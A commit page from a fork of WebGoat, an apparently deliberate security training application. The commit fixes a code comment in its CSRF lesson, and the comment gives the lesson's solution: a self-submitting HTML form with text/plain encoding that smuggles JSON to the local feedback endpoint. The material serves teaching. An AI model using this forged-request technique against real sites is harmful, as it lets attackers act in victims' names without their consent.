dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

docs(CSRFFeedback.java): fixed one invalid solution about CSRF attack (#2010)

Browse Source 
Co-authored-by: HackHuang <GoogTech@outlook.com>
Co-authored-by: HackHuang <hi@goog.tech>
This commit is contained in:
Nanne Baars 2025-01-26 20:23:40 +01:00 committed by GitHub
parent 2ac50bfbd8
commit 9c90a24cc0
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 8 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
View File

@ -115,10 +115,13 @@ public class CSRFFeedback implements AssignmentEndpoint {
return false; return false;
} }
/** /*
* Solution <form name="attack" enctype="text/plain" * Solution:
* action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> <input * <form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST">
* type="hidden" name='{"name": "Test", "email": "test1233@dfssdf.de", "subject": "service", * <!-- Construct valid JSON data: {name: "HackHuang", email: "email@example.com", subject: "suggestions", message: "Fixed the invalid solution="} -->
* "message":"dsaffd"}'> </form> <script>document.attack.submit();</script> * <input type="hidden" name='{"name": "HackHuang", "email": "email@example.com", "subject": "suggestions","message":"Fixed the invalid solution', value='"}'>
* </form>
* <script>document.attack.submit();</script>
*/ */
} }